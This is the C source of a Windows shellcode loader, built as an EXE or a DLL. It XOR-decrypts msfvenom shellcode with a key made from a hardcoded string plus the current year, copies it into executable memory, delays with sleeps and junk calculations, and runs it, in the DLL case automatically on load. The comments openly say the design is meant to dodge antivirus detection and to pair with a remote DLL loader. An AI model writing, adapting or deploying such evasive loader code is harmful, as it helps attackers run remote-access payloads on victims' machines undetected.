#include <windows.h>
#include <stdio.h>
#include <string.h> 

/* 
 This program executes sh3llcode stored in the hamdinger_data.h header.
 The hamdinger_data.h header is generated by the complimentary xor_encrypt.py 
 script. For the purpose of this DLL, xor_encrypt.py should be used to encrypt
 raw shell code generated by msfvenom.

 This may seem redundant, becuase msfvenom can already do this, but this
 gets caught less often ¯\_(ツ)_/¯

 It's on you to pick the msf PAYLOAD and LHOST config. This compiled DLL is 
 intended to be used with the remote_dll_loader.c program.  

 Build as an EXE:

 $ x86_64-w64-mingw32-gcc xor_loader.c -D BUILD_EXE -o hamdinger.exe

 or DLL:
 $ x86_64-w64-mingw32-gcc xor_loader.c -shared -o hamdinger.dll

 The HARCODED_KEY_PART will have the current calendar year appended to it at 
 runtime. Be sure to account for this when using the xor_encrypt.py script.
*/

#include "hamdinger_data.h"

#define HAMDINGER_PART "LudicrousGibs"
#define MAX_KEY_LEN 100

typedef void (*HAMDINGER_FUNC)();

void xor_decrypt(unsigned char* data, unsigned int data_len, const char* key) {
    unsigned int key_len = strlen(key);
    for (unsigned int i = 0; i < data_len; i++) {
        data[i] ^= key[i % key_len];
    }
}

DWORD perform_useless_calculations(int a, int b, int c, int d) {
    DWORD tick = GetTickCount();
    DWORD result = (a * 1024 + b) / 3;
    result ^= (c << (tick % 8));
    result += (d | (tick & 0xFF));
    result = (result * (a + c)) % 997;
    result *= tick;
    result >>= (b % 4);
    return result;
}

// --- SHARED EXECUTION LOGIC ---
void RunHamdinger() {
    SYSTEMTIME st;
    char yack_face[MAX_KEY_LEN];
    char bear_str[5];

    GetLocalTime(&st);
    _snprintf(bear_str, sizeof(bear_str), "%d", st.wYear);

    strcpy(yack_face, HAMDINGER_PART);
    strcat(yack_face, bear_str);

    printf("Decrypting hamdinger with yack: '%s'\n", yack_face);

    unsigned char* happy_hamdinger = (unsigned char*)VirtualAlloc(
        NULL,
        hamdinger_len,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (happy_hamdinger == NULL) {
        printf("Error: VirtualAlloc failed.\n");
        return;
    }

    RtlMoveMemory(happy_hamdinger, encrypted_hamdinger, hamdinger_len);
    perform_useless_calculations(4, 15, 7, 9);
    xor_decrypt(happy_hamdinger, hamdinger_len, yack_face);

    Sleep(15000);
    printf("Hamdinger is happy. Length: %u bytes.\n", hamdinger_len);
    perform_useless_calculations(4, 15, 7, 9);

    Sleep(10000);

    perform_useless_calculations(3, 2, 17, 5);
    printf("Hamdingging...\n");

    HAMDINGER_FUNC HamdingerFunction = (HAMDINGER_FUNC)happy_hamdinger;
    HamdingerFunction();

    VirtualFree(happy_hamdinger, 0, MEM_RELEASE);
}

// --- CONDITIONAL ENTRY POINTS ---

#ifdef BUILD_EXE
// This runs when you compile as an EXE
int main(int argc, char* argv[]) {
    printf("Running as Standalone..\n");
    RunHamdinger();
    return 0;
}
#else
// This runs when you compile as a DLL
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(hinstDLL);
        RunHamdinger();
    }
    return TRUE;
}
#endif
